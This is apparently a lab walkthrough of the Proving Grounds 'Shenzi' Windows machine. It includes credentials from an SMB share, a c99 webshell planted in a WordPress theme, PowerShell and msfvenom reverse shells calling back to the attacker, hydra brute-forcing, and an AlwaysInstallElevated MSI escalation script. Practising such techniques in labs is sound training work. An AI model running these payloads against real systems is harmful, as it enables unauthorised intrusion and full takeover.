
Proving Grounds Practice - Shenzi

Difficulty

Medium

Scan

```
[*] ftp found on tcp/21.
FileZilla ftpd 0.9.41


[*] http found on tcp/80.
Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Welcome to XAMPP
img icons Webalizer


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] http found on tcp/443.

[*] microsoft-ds found on tcp/445.
anonymous found default passwords
mysql: root: empty
Mercury: newuser: wampp
webdav: xampp-dav-unsecure: ppmax2011
wordpress: admin: FeltHeadwallWight357
phpmyadmin: root: secret/http
```

21 ftp

Unable to log in.

80/443 xampp

XAMPP default page.

The phpinfo page linked from it reveals a user named shenzi.

phpMyAdmin reports that it can only be accessed from the local network. Tried to bypass this with the Burp Suite bypass-WAF extension (which injects headers such as X-Forwarded-For), without success: XAMPP restricts /phpmyadmin with Apache's Require local in httpd-xampp.conf, which checks the TCP peer address, so spoofed client-IP headers are never consulted.

Grok3: XAMPP takes the client IP directly, because there is no gateway/proxy such as nginx in between.

445 smb

Anonymous login is allowed; downloaded every file. The passwords file turned out to be the interesting one.

```
smbclient //192.168.111.55/Shenzi -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 28 23:45:09 2020
  ..                                  D        0  Thu May 28 23:45:09 2020
  passwords.txt                       A      894  Thu May 28 23:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 23:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp     A     3879  Thu May 28 23:45:09 2020
  why.tmp                             A      213  Thu May 28 23:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 23:45:09 2020

                12941823 blocks of size 4096. 6497008 blocks available
smb: \>
```

passwords.txt contained several accounts and passwords. I noted them down and tried brute-forcing SMB and FTP with hydra; both attempts failed: hydra -l shenzi -P pass.txt -s 21 192.168.184.55 ftp

readme_en.txt mentions that MailToDisk writes outgoing mail to a local file; some searching and experimenting around this led nowhere.

xampp-control.ini shows that MySQL and Apache are started; nothing else of interest.

Got stuck, so checked the hint: Enumerate SMB shares to find an important file. Then, use some guesswork to locate the Wordpress website.

Port 80 had already been scanned with wpscan, so the directory must be wrong. Guessed /shenzi/, visited http://192.168.111.55/shenzi/wp-admin, and logged in successfully with admin:FeltHeadwallWight357.

Foothold

WordPress exploitation methods

https://www.hackercoolmagazine.com/wordpress-reverse-shelling-multiple-methods/

Edited the theme's 404 page directly, replacing it with the c99 webshell

https://github.com/phpwebshell/c99shell/blob/main/c99.php

Generated a PowerShell reverse shell command on revshell.com

Pasted it in and executed it; got a PowerShell shell as shenzi

```
rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.55] 61137
id
PS C:\xampp\htdocs\shenzi\wp-content\plugins\malicious> whoami
shenzi\shenzi
```

Escalation

First checked the database that is only reachable locally: mysql -u root logs in with no password, but nothing useful was found there.

AlwaysInstallElevated

Uploaded winPEAS to gather information; see the link below.

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated

Further reading: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

If both of these registry values (AlwaysInstallElevated under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and under HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer) are enabled (set to 0x1), a user of any privilege level can install, i.e. execute, *.msi files as NT AUTHORITY\SYSTEM. A 1 in only one of the two hives is not enough.

Exploitation:

  1. Generate the MSI locally: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f msi -o ~/pentestools/tmp/r.msi

The doc additionally gives UAC-related variants:

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

  2. Execute on the target: msiexec /qn /i r.msi

```
C:\users\shenzi>msiexec /quiet /qn /i rr.msi
msiexec /quiet /qn /i rr.msi
```
```
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.111.55] 51913
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```

Side note: msiexec /quiet /qn /i rr.msi just would not work from the reverse PowerShell shell. I suspected PowerShell was the problem and ran cmd to switch to a cmd shell, but could not switch either. In the end I generated a reverse cmd exe with msfvenom, and from that shell re-ran msiexec and got SYSTEM.
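As an added example for the check-then-exploit sequence above (this is not code from the write-up or from the linked HackTricks/Hacking Articles pages), the PowerShell below reads AlwaysInstallElevated from both hives, refuses to continue unless both are 1, and only then hands the package to msiexec. It assumes the MSI was built with msfvenom as shown and copied to C:\Users\shenzi\rr.msi (an assumed path) and that the listener on port 443 is already running on the attacker box.

```powershell
# Added example for this write-up, not code from the page or the linked references.
# Assumptions: MSI built with msfvenom as above and copied to C:\Users\shenzi\rr.msi;
# the attacker's listener is already waiting.

function Get-AlwaysInstallElevated {
    # The policy only takes effect when the value is 1 under BOTH hives.
    $hives = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $state = [ordered]@{}
    foreach ($key in $hives) {
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or missing value both mean "not set", which we treat as 0.
        $state[$key] = if ($null -eq $item) { 0 } else { [int]$item.AlwaysInstallElevated }
    }
    return $state
}

function Test-AlwaysInstallElevated {
    $state = Get-AlwaysInstallElevated
    foreach ($entry in $state.GetEnumerator()) {
        Write-Host ("{0,-60} {1}" -f $entry.Key, $entry.Value)
    }
    # Exploitable only when no hive reports anything other than 1.
    return (@($state.Values | Where-Object { $_ -ne 1 }).Count -eq 0)
}

function Invoke-ElevatedMsi {
    param([Parameter(Mandatory = $true)][string]$MsiPath)

    if (-not (Test-Path -LiteralPath $MsiPath)) {
        throw "MSI not found: $MsiPath"
    }
    if (-not (Test-AlwaysInstallElevated)) {
        Write-Warning 'AlwaysInstallElevated is not 1 in both hives; msiexec would run the package as the current user.'
        return $false
    }

    # /i = install, /qn = no UI (the write-up's /quiet is the same as /qn).
    # Deliberately not waiting on the process: the MSI's custom action is the
    # reverse shell, so msiexec stays alive until that shell exits.
    $msiexec = Join-Path $env:SystemRoot 'System32\msiexec.exe'
    $proc = Start-Process -FilePath $msiexec -ArgumentList @('/i', "`"$MsiPath`"", '/qn') -PassThru
    Write-Host "msiexec started (PID $($proc.Id)); check the listener."
    return $true
}

Invoke-ElevatedMsi -MsiPath 'C:\Users\shenzi\rr.msi'
```

The same check from a plain cmd shell is reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated, repeated with HKCU; either way it is worth running before uploading winPEAS, since it is a two-line question. Once the SYSTEM shell is in hand, delete the MSI from the target; the install itself will have reported failure because the payload custom action never returns success, and that is expected.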

Reflections

  1. In the information-gathering phase a lot of information is collected; how do you tell which piece is the most likely to be exploitable? I would never have thought of the shenzi directory.
  2. During privilege escalation I found AlwaysInstallElevated; I should make a point of checking for it first.